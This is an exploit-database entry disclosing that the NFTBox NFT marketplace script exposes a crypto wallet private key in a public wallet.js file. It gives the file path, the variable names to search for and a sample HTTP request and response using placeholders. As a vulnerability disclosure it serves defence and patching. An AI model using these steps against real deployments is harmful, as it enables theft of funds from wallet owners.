Share
## https://sploitus.com/exploit?id=PACKETSTORM:214177
# Exploit Title: NFTBox - NFT Marketplace Solution - Hardcoded Private Key Disclosure
    # Date: 2026-01-21
    # Exploit Author: Sohel Yousef -- https://www.linkedin.com/in/sohel-yousef-50a905189/
    # Vendor Homepage: https://bdtask.com/
    # Software Link: https://codecanyon.net/item/nftbox-nft-marketplace-solution/35043063
    # Version: Latest
    # Tested on: Linux/Windows
    # CVE: N/A
    
    Description:
    A critical Information Disclosure vulnerability exists in the 'NFTBox' script. 
    The application exposes a sensitive crypto wallet Private Key within a public JavaScript file (`wallet.js`). 
    This allows malicious actors to potentially access funds or interact with smart contracts unauthorizedly.
    
    Vulnerable File:
    /public/assets/website/js/wallet.js
    
    Proof of Concept (PoC):
    
    1. Navigate to the following path on the target application:
       https://[TARGET-DOMAIN]/public/assets/website/js/wallet.js
    
    2. Search for variable declarations related to wallet configuration (e.g., 'privateKey', 'secret').
    
    3. The private key is visible in plain text.
    
    Sample Request:
    GET /public/assets/website/js/wallet.js HTTP/1.1
    Host: [TARGET-DOMAIN]
    
    Response (Snippet):
    ...
    var privateKey = "0x123456..."; // SENSITIVE DATA EXPOSED
    ...
    
    Impact:
    Full compromise of the associated wallet, loss of funds, and unauthorized smart contract manipulation.